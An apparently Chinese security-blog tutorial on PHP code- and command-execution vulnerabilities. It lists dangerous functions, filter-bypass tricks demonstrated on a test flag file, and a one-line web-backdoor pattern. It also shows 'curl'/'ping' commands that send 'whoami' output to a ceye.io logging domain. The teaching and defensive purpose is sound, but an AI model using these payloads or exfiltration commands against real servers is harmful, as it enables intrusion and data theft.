<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/image3.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="zs0zrc&#39;s blog">
  <meta name="author" content="zs0zrc">
  <meta name="keywords" content="pwn CTF security anythings">
  <title>命令执行&amp;代码执行漏洞学习 - zs0zrc</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


<!-- 自定义样式保持在最底部 -->


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>zs0zrc</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/image1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期六, 五月 23日 2020, 3:34 下午
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    2.4k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      10 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p class="note note-warning">本文最后更新于：星期六, 五月 23日 2020, 9:15 晚上</p>
            
            <div class="markdown-body">
              <h2 id="命令执行-amp-代码执行漏洞学习"><a href="#命令执行-amp-代码执行漏洞学习" class="headerlink" title="命令执行&amp;代码执行漏洞学习"></a>命令执行&amp;代码执行漏洞学习</h2><h3 id="代码执行漏洞"><a href="#代码执行漏洞" class="headerlink" title="代码执行漏洞"></a>代码执行漏洞</h3><p>代码执行漏洞是由于web应用过滤不严谨，导致用户可以通过请求将代码注入到web应用中进行执行。php中有一些函数可以将参数当作代码来执行，例如assert()、call_user_func()等。当开发者使用了这些函数时，但没有对参数进行严格限制，导致了用户可以控制这些函数的参数，执行任意代码，这就是代码执行漏洞。</p>
<h4 id="常见危险函数"><a href="#常见危险函数" class="headerlink" title="常见危险函数"></a>常见危险函数</h4><p><strong>php代码执行相关的函数</strong></p>
<ul>
<li><p>eval()</p>
<pre><code class="php">mixed eval(string $code)
</code></pre>
<p>$code是需要被执行的字符串，这个字符串必须以<code>;</code>结尾。同时代码不能包含PHP tags，例如：”&lt;?php echo ‘1’ ?&gt;”这样的字符串是不行的。</p>
<p>eval()不是一个函数，它是一个语言构造器，所以不可以被可变函数调用。</p>
</li>
<li><p>assert()</p>
<pre><code class="php">bool assert(mixed $assertion [, string $description])
</code></pre>
<p>assert()函数是PHP中用来判断一个表达式是否成立的函数，返回值是true or false 。</p>
<p>如果传入的assertion是字符串的话，那它会被assert()当作php代码来执行。</p>
<p>assert()函数传入的php代码不需要<code>;</code>来作为结尾</p>
</li>
<li><p>preg_replace()</p>
<pre><code class="php">preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] ) : mixed
</code></pre>
<p>preg_replace()函数用来执行一个正则表达式的搜索和替换，搜索subject中匹配pattern的部分，然后用replacement进行替换。</p>
<p>当$pattern参数中存在/e修饰符时，$replacement会被当作php代码来执行。</p>
<p>PHP5.5.0版本起，/e修饰符已经被弃用了，使用preg_replace_callback()代替，如果传入/e修饰符，会产生一个E_DEPRECATED错误，但是$replacement还是会被当作代码执行。</p>
<p>PHP7.0版本起，会产生E_WARNING错误，同时/e修饰符无法生效。</p>
</li>
<li><p>call_user_func()</p>
<pre><code class="php">mixed call_user_func(callable $callback[, mixed $parameter[, mixed $..]])
</code></pre>
<p>第一个参数callback时 被调用的回调函数，其余参数是回调函数的参数。</p>
</li>
<li><p>array_map</p>
<p>用法：</p>
<pre><code class="php">array array_map(callable $callback, array $array1[, array $...])
</code></pre>
<p>array_map为数组的每个元素应用回调函数。callback函数形参的数量要和传给array_map()数组数量一致。</p>
</li>
<li><p>call_user_func_array</p>
<pre><code class="php">mixed call_user_func_array ( callable $callback , array $param_arr )
</code></pre>
<p>第一个参数是回调函数，第二个参数是回调函数的参数数组</p>
</li>
<li><p>create_function</p>
<p>create_function用于创建一个匿名函数，它内部实现用到了eval。</p>
<p>用法：</p>
<pre><code class="php">create_function ( string $args , string $code ) : string
</code></pre>
<p>第一个参数args是后面定义函数的参数，第二个参数$code是函数代码</p>
</li>
</ul>
<h4 id="PHP动态函数"><a href="#PHP动态函数" class="headerlink" title="PHP动态函数"></a>PHP动态函数</h4><p>因为PHP特性的原因，PHP的函数名可以由字符串来进行拼接</p>
<p>例如：</p>
<pre><code class="php">&lt;?php
    $a = &#39;a&#39;.&#39;s&#39;.&#39;s&#39;.&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;
    $a(phpinfo());
?&gt;
</code></pre>
<p>或者：</p>
<pre><code class="php">$_GET[&#39;a&#39;]($_POST[&#39;b&#39;]);
</code></pre>
<p>利用这样的写法可以进行各种变形，通常被当作web后门使用</p>
<h4 id="Curly-Syntax"><a href="#Curly-Syntax" class="headerlink" title="Curly Syntax"></a>Curly Syntax</h4><p>PHP中的Curly Syntax也能导致代码执行，它将执行花括号间的代码，并且将结果替换回去。</p>
<p>demo:</p>
<pre><code class="php">&lt;?php
$test = &quot;phpinfo&quot;;
${&quot;test&quot;}();
?&gt;
</code></pre>
<h3 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h3><p>命令执行漏洞是指可以执行系统或者应用命令(cmd命令或者bash命令)的漏洞，主要是由于web应用使用了一些能执行命令的函数，但是对它们的参数过滤不严谨导致。</p>
<h4 id="常见危险函数-1"><a href="#常见危险函数-1" class="headerlink" title="常见危险函数"></a>常见危险函数</h4><ul>
<li><p>system</p>
<pre><code class="php">system(string $command[, int &amp;$return_var]): string 
</code></pre>
<p>system函数会执行command参数所指定的命令，并且输出执行结果。</p>
</li>
<li><p>exec</p>
<pre><code class="php">exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) : string
</code></pre>
<p>exec()会执行command指定的命令</p>
</li>
<li><p>shell_exec()</p>
<pre><code class="php">shell_exec ( string $cmd ) : string
</code></pre>
<p>shell_exec()会通过shell环境执行命令，并且将完整的输出以字符串的方式返回。</p>
<p>执行操作符<code></code>就是通过shell_exec()实现的。</p>
</li>
<li><p>passthru</p>
<pre><code class="php">passthru ( string $command [, int &amp;$return_var ] ) : void
</code></pre>
<p>与exec()函数类似，执行外部程序并且显示原始输出</p>
</li>
<li><p>pcntl_exec</p>
<pre><code class="php">pcntl_exec ( string $path [, array $args [, array $envs ]] ) : void
</code></pre>
<p>pcntl是php的多进程处理扩展，在处理大量任务的情况下会使用到，需要额外安装。</p>
<p>$path是可执行程序的路径，$args是传递给$path程序的参数。</p>
<p>例如：</p>
<pre><code class="php">pcntl_exec(&quot;/bin/bash&quot;,array(&quot;whoami&quot;));
</code></pre>
</li>
<li><p>popen</p>
<pre><code class="php">popen ( string $command , string $mode ) : resource
</code></pre>
<p>popen()函数打开一个指向进程的管道，该进程由派生给定的command命令执行产生</p>
<p>例如：</p>
<pre><code class="php">popen(&quot;whoami &gt;&gt; test.php&quot;,&quot;r&quot;);
</code></pre>
</li>
<li><p>proc_open</p>
<pre><code class="php">proc_open ( string $cmd , array $descriptorspec , array &amp;$pipes [, string $cwd = NULL [, array $env = NULL [, array $other_options = NULL ]]] ) : resource
</code></pre>
<p>与popen()类似，执行一个命令，并且打开用来输入输出的文件指针，提供了比popen()更加强大的控制程序执行的能力。</p>
</li>
<li><p>ob_start</p>
<pre><code class="php">ob_start ([ callback $output_callback [, int $chunk_size [, bool $erase ]]] ) : bool
</code></pre>
<p>这个 函数将打开输出缓冲。当输出缓冲激活后，脚本将不会输出内容（除http标头外），相反需要输出的内容被存储在内部缓冲区中。   </p>
<p>内部缓冲区的内容可以用 <a href="https://www.php.net/manual/zh/function.ob-get-contents.php" target="_blank" rel="noopener">ob_get_contents()</a> 函数复制到一个字符串变量中。想要输出存储在内部缓冲区中的内容，可以使用 <a href="https://www.php.net/manual/zh/function.ob-end-flush.php" target="_blank" rel="noopener">ob_end_flush()</a> 函数。另外，使用 <a href="https://www.php.net/manual/zh/function.ob-end-clean.php" target="_blank" rel="noopener">ob_end_clean()</a> 函数会静默丢弃掉缓冲区的内容。 </p>
<p>可选参数callback如果被指定，那么当输出缓冲区被送出或者清洗时，或者请求结束之际，该函数将会被调用。</p>
<p>当该函数调用时，输出缓冲区的内容会被当作参数去执行，并返回一个新的输出缓冲区作为结果，并且送到浏览器中去。</p>
<p>例子：</p>
<pre><code class="php">&lt;?php
    $cmd=&#39;system&#39;;
    ob_start($cmd);
    echo &quot;$_GET[&#39;a&#39;]&quot;;
    ob_end_flush();
?&gt;
</code></pre>
</li>
</ul>
<h4 id="常见绕过姿势"><a href="#常见绕过姿势" class="headerlink" title="常见绕过姿势"></a>常见绕过姿势</h4><h5 id="命令操作符"><a href="#命令操作符" class="headerlink" title="命令操作符"></a>命令操作符</h5><ol>
<li><p>cmd1 | cmd2 (|管道操作符)</p>
<p>管道操作符会将cmd1的结果输出给cmd2</p>
</li>
<li><p>cmd1 &amp; cmd2 (&amp;和号操作符)</p>
<p>&amp;会让命令在后台运行</p>
</li>
<li><p>cmd1 ; cmd2 (; 分号操作符)</p>
<p>执行多条命令</p>
</li>
<li><p>cmd1 &amp;&amp; cmd2 (&amp;&amp;与操作符)</p>
<p>只有cmd1执行成功后才会去执行cmd2</p>
</li>
<li><p>cmd1 || cmd2 (|| 或操作符)</p>
<p>cmd1执行失败才会执行cmd2</p>
</li>
</ol>
<h5 id="空格过滤绕过"><a href="#空格过滤绕过" class="headerlink" title="空格过滤绕过"></a>空格过滤绕过</h5><ol>
<li><p>字符串拼接</p>
<p>IFS(内部域分隔)是SHELL内置变量，是一个用于分隔的字符列表，默认值是空白(空格、tab、换行)</p>
<p>用法：</p>
<pre><code class="shell">root@DESKTOP-10M601S:/home# cat${IFS}flag
flag{just_simple_flag}
root@DESKTOP-10M601S:/home# cat$IFS&#39;flag&#39;
flag{just_simple_flag}
root@DESKTOP-10M601S:/home# cat$IFS&quot;flag&quot;
flag{just_simple_flag}
root@DESKTOP-10M601S:/home# cat$IFS$1flag
flag{just_simple_flag}
</code></pre>
</li>
<li><p>使用{}</p>
<p>例如：</p>
<pre><code class="shell">root@DESKTOP-10M601S:/home# {cat,flag}
flag{just_simple_flag}
</code></pre>
</li>
<li><p>使用tab</p>
<p>例如：</p>
<pre><code>?id=cat%09/etc/passwd
</code></pre></li>
<li><p>使用重定向符</p>
<p>在读取文件时可以使用重定向符来替代空格</p>
<p>例如：</p>
<pre><code class="shell">root@DESKTOP-10M601S:/home# cat&lt;&gt;flag
flag{just_simple_flag}
root@DESKTOP-10M601S:/home# cat&lt;flag
flag{just_simple_flag}
</code></pre>
</li>
</ol>
<h5 id="黑名单关键字绕过"><a href="#黑名单关键字绕过" class="headerlink" title="黑名单关键字绕过"></a>黑名单关键字绕过</h5><ol>
<li><p>字符串拼接</p>
<pre><code>a=c;b=at;c=fl;d=ag;$a$b ${c}${d}
root@DESKTOP-10M601S:/home# a=c;b=at;c=fl;d=ag;$a$b ${c}${d}
flag{just_simple_flag}
</code></pre></li>
<li><p>利用环境变量</p>
<p>linux下有一些环境变量，可以通过这些分割这些变量来拼接出想要的字符串</p>
<pre><code>root@DESKTOP-10M601S:/home# echo ${SHELLOPTS}
braceexpand:emacs:hashall:histexpand:history:interactive-comments:monitor
root@DESKTOP-10M601S:/home# echo ${SHELLOPTS:3:1}
c
root@DESKTOP-10M601S:/home# echo ${SHELLOPTS:2:1}
a
root@DESKTOP-10M601S:/home# ${SHELLOPTS:3:1}at${IFS}flag
flag{just_simple_flag}
</code></pre></li>
<li><p>利用空变量</p>
<pre><code>root@DESKTOP-10M601S:/home# cat fl${x}ag
flag{just_simple_flag}
</code></pre></li>
<li><p>利用linux通配符?*</p>
<pre><code>root@DESKTOP-10M601S:/home# /bin/ca? fl??
flag{just_simple_flag}
</code></pre></li>
<li><p>利用反斜杠</p>
<p>\反斜杠在bash中被解释为转义字符，用于去除单个字符的特殊意义。它保留了跟随在之后的字符的字面值(除了换行符)。</p>
<pre><code>root@DESKTOP-10M601S:/home# ca\t f\lag
flag{just_simple_flag}
</code></pre></li>
<li><p>利用bash64编码</p>
<pre><code>root@DESKTOP-10M601S:/home# echo t | base64
dAo=
root@DESKTOP-10M601S:/home# ca$(echo &quot;dAo=&quot; | base64 -d) flag
flag{just_simple_flag}
root@DESKTOP-10M601S:/home# echo flag | base64
ZmxhZwo=
root@DESKTOP-10M601S:/home# cat $(echo &quot;ZmxhZwo=&quot; |base64 -d)
flag{just_simple_flag}
</code></pre></li>
</ol>
<h5 id="无回显情况"><a href="#无回显情况" class="headerlink" title="无回显情况"></a>无回显情况</h5><p>命令执行可能会存在没有回显的情况。这时要判断命令是执行，有三种方法。</p>
<ol>
<li><p>延时</p>
<p>通过sleep命令来进行延时</p>
<p>例子：</p>
<pre><code class="php">&lt;?php
    shell_exec($_GET[&#39;a&#39;]);
?&gt;
</code></pre>
<p>访问：</p>
<pre><code>http://localhost/demo.php?a=sleep 3
</code></pre></li>
<li><p>HTTP请求</p>
<p>首先要有一台公网可通信的机子，目标通过向这个机子发起http请求，当该机子收到http请求时，说明命令执行成功。</p>
<p>如果没有一台公网机子的话，可以去ceye注册一个账号。</p>
<p>注册了以后他会分配一个3级域名给你，通过向这个域名发起http请求可以将命令执行的数据带出</p>
<p>例子：</p>
<pre><code>root@DESKTOP-10M601S:/home# curl http://vlut7q.ceye.io/`whoami`
{&quot;meta&quot;: {&quot;code&quot;: 201, &quot;message&quot;: &quot;HTTP Record Insert Success&quot;}}
</code></pre><p><img src="/picture/image-20200523211052128.png" srcset="/img/loading.gif" alt="image-20200523211052128"></p>
<p>一般使用http请求带出的数据最好经过base64编码一下。</p>
<pre><code>root@DESKTOP-10M601S:/home# curl http://vlut7q.ceye.io/`whoami|base64`
</code></pre></li>
</ol>
<ol start="3">
<li><p>使用DNS通道带出</p>
<p>如果请求的目标不是ip地址而是域名，那么域名最终还要转化成ip地址，就肯定要做一次域名解析请求。那么假设我有个可控的二级域名，那么它发出三级域名解析的时候，我这边是能够拿到它的域名解析请求的，这就相当于可以配合DNS请求进行命令执行的判断，这一般就被称为dnslog。 </p>
<p>这里用的同样是ceye ，通过ping命令来发起dns请求</p>
<pre><code>root@DESKTOP-10M601S:/home# ping `whoami`.vlut7q.ceye.io
</code></pre><p><img src="/picture/image-20200523211415039.png" srcset="/img/loading.gif" alt="image-20200523211415039"></p>
</li>
</ol>
<h3 id="代码执行和命令执行漏洞防御"><a href="#代码执行和命令执行漏洞防御" class="headerlink" title="代码执行和命令执行漏洞防御"></a>代码执行和命令执行漏洞防御</h3><ul>
<li>对相应的函数设置参数的白名单，结合正则表达式来进行白名单限制</li>
<li>对参数进行严格过滤</li>
<li>最简单的方法就是不允许命令执行</li>
</ul>
<h3 id="REFERENCE"><a href="#REFERENCE" class="headerlink" title="REFERENCE"></a>REFERENCE</h3><ul>
<li><a href="https://chybeta.github.io/2017/08/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/" target="_blank" rel="noopener">https://chybeta.github.io/2017/08/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/</a></li>
<li><a href="https://chybeta.github.io/2017/08/08/php%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">https://chybeta.github.io/2017/08/08/php%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/</a></li>
<li><a href="https://ctf-wiki.github.io/ctf-wiki/web/php/php-zh/#_12" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/web/php/php-zh/#_12</a></li>
</ul>

            </div>
            <hr>
            <div>
              <p>
                
                  <span>
                <i class="iconfont icon-inbox"></i>
                    
                      <a class="hover-with-bg" href="/categories/WEB/">WEB</a>
                      &nbsp;
                    
                  </span>&nbsp;&nbsp;
                
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
            </div>

            
              <!-- Comments -->
              <div class="comments" id="comments">
                
                
  <script defer src="https://utteranc.es/client.js" repo="zszcr/comment" issue-term="pathname" label="utterances" theme="github-light" crossorigin="anonymous" async>
  </script>


              </div>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js"></script>
<script src="/js/main.js"></script>


  <script src="/js/lazyload.js"></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js"></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var post = $('#post');
      var toc = $('#toc');
      var tocLimMax = post.offset().top + post.height() - navHeight;

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = $('#board-ctn').css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




<!-- Plugins -->


  

  
    <!-- Google Analytics -->
    <script defer>
      (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
          (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o),
          m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
      })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');

      ga('create', 'UA-160202176-1', 'auto');
      ga('send', 'pageview');
    </script>
  

  

  

  



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "命令执行&代码执行漏洞学习&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
